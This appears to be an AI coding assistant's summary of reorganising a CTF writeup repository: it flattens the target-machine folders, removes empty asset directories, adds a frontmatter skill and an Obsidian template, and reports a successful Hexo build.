The target-machine directories now follow the BUUCTF/WEB layout; each md file was moved up one level out of its nested subfolder:

靶机/QQGroup/111/111.md  →  靶机/QQGroup/111.md
靶机/vulnhub/DC/DC9/DC9.md → 靶机/vulnhub/DC9.md
...

All empty images/ and assets/ subdirectories were removed.

5. Automation (Skill + template)

  • Claude Code Skill: .claude/skills/add-frontmatter.md, which adds frontmatter automatically whenever a new md file is created from now on
  • Obsidian template: templates/CTF-Writeup.md (Cmd+P → Insert template → CTF-Writeup)

Final state

  • Hexo build (hexo g): 214 files generated
  • Index titles: 0 Untitled, all correct
  • Images: all 126 copied to public/assets/, and the HTML references to /assets/xxx.png resolve correctly